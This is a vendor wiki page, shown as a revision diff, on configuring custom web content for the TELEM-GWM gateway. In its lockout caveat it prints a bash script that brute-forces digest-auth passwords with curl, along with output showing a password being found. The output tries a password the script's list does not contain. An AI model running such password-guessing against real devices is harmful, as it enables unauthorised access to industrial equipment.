Custom Web Page for TELEM-GWM: Difference between revisions
No edit summary |
|||
(4 intermediate revisions by one other user not shown) | |||
Line 1: | Line 1: | ||
This is a basic guideline for developing custom web pages for TELEM-GWM. It is assumed that reader is familiar with TELEM-GWM configuration software gws.exe and understands how to secure the device. Securing the device is described in [[Basic Security]]. | This is a basic guideline for developing custom web pages for TELEM-GWM. It is assumed that reader is familiar with TELEM-GWM configuration software gws.exe and understands how to secure the device. Securing the device is described in [[Basic Security]]. An example of custom developement can be found here [[GW6 web schema]]. | ||
=== What Features to Enable? === | === What Features to Enable? === | ||
Line 15: | Line 15: | ||
<br /> | <br /> | ||
Under “SSL” secure socket layer can be enabled. There are two options to use: in device generated keys or, user generated keys. | Under “SSL” secure socket layer can be enabled. There are two options to use: in device generated keys or, user generated keys. | ||
[[ | [[Image:WebServerSettings.png|283px|thumb|center|Figure 1: Web Server Settings]] | ||
=== Caveats === | === Caveats === | ||
==== Three Password Attempts ==== | ==== Three Password Attempts ==== | ||
Line 24: | Line 25: | ||
<br /> | <br /> | ||
<br /> | <br /> | ||
All in all it means that | All in all it means that only dummy users hitting 4 times the OK button in loging popup are rejected. Scripts like this work ok: | ||
<syntaxhighlight lang="bash"> | |||
#!/bin/bash | |||
echo "Get TELEM-GW content!" | |||
array=( pass 12345 54321 martem123456 password qwerty kjhgfd ) | |||
for i in "${array[@]}" | |||
do | |||
echo "Trying $i" | |||
rm index.html | |||
curl -s -S --user martem:$i --digest http://10.0.0.29 -o index.html | |||
status=`diff -s -q index.html error.html` | |||
if [ "$status" = "Files index.html and error.html differ" ]; then | |||
echo "Found, password=$i" | |||
exit 0 | |||
fi | |||
done | |||
echo "Done, no password match" | |||
exit -1 | |||
</syntaxhighlight> | |||
And the output: | |||
<pre> | |||
$ date ; ./telem-gw.sh ; date | |||
Fri Aug 16 13:43:36 EEST 2013 | |||
Get TELEM-GW content! | |||
Trying pass | |||
rm: cannot remove `index.html': No such file or directory | |||
Trying 12345 | |||
Trying 54321 | |||
Trying martem123456 | |||
Trying password | |||
Trying qwerty | |||
Trying kjhgfd | |||
Trying martem | |||
Found, password=martem | |||
Fri Aug 16 13:43:53 EEST 2013 | |||
$ | |||
</pre> | |||
==== No Automatic index.html from Subfolder(s) ==== | ==== No Automatic index.html from Subfolder(s) ==== | ||
Web server will not load automatically index.html or index.htm from subfolder(s). | Web server will not load automatically index.html or index.htm from subfolder(s). | ||
==== No HTTP to HTTPS Redirection ==== | ==== No HTTP to HTTPS Redirection ==== | ||
You need to know which protocol is used. Don't worry the browser remembers the url's. | You need to know which protocol is used. Don't worry the browser remembers the url's. |
Latest revision as of 12:29, 31 May 2019
This is a basic guideline for developing custom web pages for TELEM-GWM. It is assumed that reader is familiar with TELEM-GWM configuration software gws.exe and understands how to secure the device. Securing the device is described in Basic Security. An example of custom developement can be found here GW6 web schema.
What Features to Enable?
On figure 1 there are features than can be configured for web server. Under “IP settings” you can select firewall settings. On which interface the web server should be enabled and if there is a IP address that should have the exclusive access to the web page. Then the TCP port selection.
Under http one can disable dynamic server features. “Forbid output control” if checked disables control operations through web server. “Enable GW application logs ..” if checked instructs the web server to send content from log files. “Enable syslog” if checked permits sending of /var/log/messages to the web client. “Enable general information ..” if checked permits sending of firmware revision and some additional info about the device to the web client. “Enable configuration ...” if checked permits sending of the configuration file of the main application to the web client. “Enable events ..” if checked permits sending of events to the web client. Events are encoded in XML.
Under “User” and “Password” an authorization can be enabled. TELEM-GWM uses digest access authentication.
Under “Custom” a custom web content can be selected. You have to select folder. All content from that folder is sent to the TELEM-GWM to be displayed to the web client.
Under “SSL” secure socket layer can be enabled. There are two options to use: in device generated keys or, user generated keys.
Caveats
Three Password Attempts
Server uses session ID's to keep track of authenticated accesses to the server. Sessions timeout within 60 seconds. If you connect to server and set password wrongly for three times the used IP gets banned by firewall. Note this IP gets panned not only from web page but from the whole device.
If user forgets the password he can look it up from setup as it is in plain text. Alternative is to close the browser after two attempts and then retry. However server supports only 200 sessions and 50 connections per IP address(4 clients with 50 sessions each). Per client count can be further minimised by manually configuring the firewall. Note firewall state count differs from server IP count. That is if you remove the restrictions from firewall, web server will only support 50 connections per IP address and total of 200 sessions.
All in all it means that only dummy users hitting 4 times the OK button in loging popup are rejected. Scripts like this work ok:
#!/bin/bash
echo "Get TELEM-GW content!"
array=( pass 12345 54321 martem123456 password qwerty kjhgfd )
for i in "${array[@]}"
do
echo "Trying $i"
rm index.html
curl -s -S --user martem:$i --digest http://10.0.0.29 -o index.html
status=`diff -s -q index.html error.html`
if [ "$status" = "Files index.html and error.html differ" ]; then
echo "Found, password=$i"
exit 0
fi
done
echo "Done, no password match"
exit -1
And the output:
$ date ; ./telem-gw.sh ; date Fri Aug 16 13:43:36 EEST 2013 Get TELEM-GW content! Trying pass rm: cannot remove `index.html': No such file or directory Trying 12345 Trying 54321 Trying martem123456 Trying password Trying qwerty Trying kjhgfd Trying martem Found, password=martem Fri Aug 16 13:43:53 EEST 2013 $
No Automatic index.html from Subfolder(s)
Web server will not load automatically index.html or index.htm from subfolder(s).
No HTTP to HTTPS Redirection
You need to know which protocol is used. Don't worry the browser remembers the url's.